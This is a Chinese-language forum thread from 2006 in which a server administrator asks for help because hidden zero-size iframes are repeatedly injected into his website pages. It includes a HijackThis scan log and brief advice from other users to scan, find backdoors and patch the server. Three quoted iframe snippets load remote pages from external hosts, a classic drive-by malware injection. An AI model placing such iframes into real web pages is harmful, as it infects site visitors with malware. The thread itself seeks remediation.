瑞星卡卡安全论坛

请帮我看看吧！！！！！！！！！！
服务器网站首页代码尾部老是插入一段代码，一般过了一晚上就有了，唉，请各位大侠帮帮忙啊。
代码：
<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://webshell.cardb.cn/hinet.htm" name="login">
上网的时候，显示打开HTTP：//WEBSHELL.CARDB.CN网页，但不真正显示。

付上hijackthis.log
Logfile of HijackThis v1.99.1
Scan saved at 8:53:44, on 2006-4-9
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
D:\hijackthis\HijackThis.exe

R3 - URLSearchHook: (no name) - {BB936323-19FA-4521-BA29-ECA6A121BC78} - (no file)
O3 - Toolbar: 电台(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINNT\system32\KakaTool.dll
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [RfwMain] "C:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - HKCU\..\Run: [Internat.exe] internat.exe
O4 - Startup: 中教育星电子图书馆服务器.LNK = G:\EDUSTAR\Server.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: 服务管理器.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra button: 访问瑞星网站 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} - http://www.rising.com.cn (file missing)
O9 - Extra button: 访问卡卡社区 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} - http://www.ikaka.com (file missing)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1123655530421
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1123655675390
O17 - HKLM\System\CCS\Services\Tcpip\..\{9FAA09EE-A6B9-46F3-944A-CF1E9BC6DD55}: NameServer = 10.0.1.2,218.2.135.1,202.102.4.141
O17 - HKLM\System\CS1\Services\Tcpip\..\{9FAA09EE-A6B9-46F3-944A-CF1E9BC6DD55}: NameServer = 10.0.1.2,218.2.135.1,202.102.4.141
O17 - HKLM\System\CS2\Services\Tcpip\..\{9FAA09EE-A6B9-46F3-944A-CF1E9BC6DD55}: NameServer = 10.0.1.2,218.2.135.1,202.102.4.141
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\CCenter.exe
O23 - Service: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\Ravmond.exe
O23 - Service: Serv-U FTP 服务器 (Serv-U) - Cat Soft - C:\Program Files\Serv-U\ServUDaemon.exe

服务器被挂马

我是菜鸟，服务器被挂马?是怎么回事啊？该怎么办呢？求求你帮帮我吧！

是不是被挂上木马啦？版主，怎样清除呢？

郁闷啊！！！！！！！！！！！
在一个论坛的网页index.asp内还发现以下代码

<iframe src="http://yege.512j.com/pn.htm" width="0" height="0" frameborder="0"></iframe>

<iframe width="0" height="0" frameborder="0" scrolling="no" src="http://qfsl.ik8.com/hinet.htm" name="loginf"></iframe>

我知道是中了网页木马了，怎样清除啊，今天把以上代码删除了，明天又有了，有没有治本的方法啊。。。。。。。。。。，痛苦着。

SOS，求救各位大侠了。

各位大侠，怎么办啊，急死人了！！！！！！！！！！！

你所说的这个网站的服务器是由你维护吗？，如果是，对服务器进行全面杀毒，如果不是，请联系托管方

服务器被挂马的话杀进程肯定是没用的~
赶快检查你的服务器程序哪里被修改了。做一下服务器安全。
可能是代码里面被放了后门。仔细检查一下

用正版瑞星2006在安全状态下杀毒也查不出什么毒来啊！
郁闷

【回复“坏种”的帖子】
主要是修改了服务器的相关文件

那怎么办呢？SOS。。。。。。。。。。

本版版本，救救我吧？我该怎么办？

【回复“坏种”的帖子】
把该堵的漏洞都先堵上，然后再重新发布页面。